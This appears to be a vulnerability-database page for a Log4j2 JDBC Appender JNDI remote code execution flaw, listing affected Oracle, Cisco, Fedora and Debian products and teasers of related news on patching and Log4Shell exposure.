Apache Log4j2 versions 2.0-beta7 up to and including 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
apache log4j |
||
apache log4j 2.0 |
||
oracle communications diameter signaling router |
||
oracle communications interactive session recorder 6.3 |
||
oracle communications interactive session recorder 6.4 |
||
oracle primavera gateway |
||
oracle primavera gateway 21.12.0 |
||
oracle primavera p6 enterprise project portfolio management |
||
oracle primavera p6 enterprise project portfolio management 21.12.0.0 |
||
oracle primavera unifier 18.8 |
||
oracle primavera unifier 19.12 |
||
oracle primavera unifier 20.12 |
||
oracle primavera unifier 21.12 |
||
oracle retail assortment planning 16.0.3 |
||
oracle retail fiscal management 14.2 |
||
oracle siebel ui framework 21.12 |
||
oracle weblogic server 12.2.1.3.0 |
||
oracle weblogic server 12.2.1.4.0 |
||
oracle weblogic server 14.1.1.0.0 |
||
cisco cloudcenter 4.10.0.16 |
||
fedoraproject fedora 34 |
||
fedoraproject fedora 35 |
||
debian debian linux 9.0 |
||
oracle communications brm - elastic charging engine |
||
oracle communications brm - elastic charging engine 12.0.0.5.0 |
||
oracle communications offline mediation controller |
||
oracle communications offline mediation controller 12.0.0.5.0 |
||
oracle flexcube private banking 12.1.0 |
||
oracle health sciences data management workbench 2.5.2.1 |
||
oracle health sciences data management workbench 3.0.0.0 |
||
oracle health sciences data management workbench 3.1.0.3 |
||
oracle policy automation |
||
oracle policy automation for mobile devices |
||
oracle product lifecycle analytics 3.6.1 |
||
oracle retail order broker 18.0 |
||
oracle retail order broker 19.1 |
||
oracle retail xstore point of service 17.0.4 |
||
oracle retail xstore point of service 18.0.3 |
||
oracle retail xstore point of service 19.0.2 |
||
oracle retail xstore point of service 20.0.1 |
||
oracle retail xstore point of service 21.0.1 |
||
oracle siebel ui framework |
IT threat evolution in Q3 2022 IT threat evolution in Q3 2022. Non-mobile statistics IT threat evolution in Q3 2022. Mobile statistics These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data. Quarterly figures According to Kaspersky Security Network, in Q3 2022: Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe. Web Anti-Virus recognized 251,288,987...
Get our weekly newsletter It's not as though folks haven't been warned about this
There have been millions of downloads of outdated, vulnerable Log4j versions despite the emergence of a serious security hole in December 2021, according to figures compiled by the firm that runs Apache Maven's Central Repository. That company, Sonatype, said it had seen four million downloads of exploitable Log4j versions from the repository alone between 10 December and the present day, out of a total of more than 10 million downloads over those past four weeks. Tracked as CVE-2021-44228 aka L...
Get our weekly newsletter Apply fixes responsibly in a timely manner or face the wrath of Lina Khan
The US Federal Trade Commission on Tuesday warned companies that vulnerable Log4j software needs to be patched … or else. In case any system administrators last month somehow missed the widespread alarm over vulnerabilities (CVE-2021-44228, CVE-2021-45046, CVE-2021-44832) in the Java logging package, the trade watchdog said Log4j continues to be exploited by a growing number of attackers and urged organizations to act now before it's too late. The FTC is advising companies to consult the US Cy...
Topics Security Off-Prem On-Prem Software Offbeat Special Features Vendor Voice Vendor Voice Resources Lack of awareness still blamed for patching apathy despite it being among most infamous bugs of all time
Two years after the Log4Shell vulnerability in the open source Java-based Log4j logging utility was disclosed, circa one in four applications are dependent on outdated libraries, leaving them open to exploitation. Research from security shop Veracode revealed that the vast majority of vulnerable apps may never have updated the Log4j library after it was implemented by developers as 32 percent were running pre-2015 EOL versions. Prior investigations from Veracode also showed that 79 percent of al...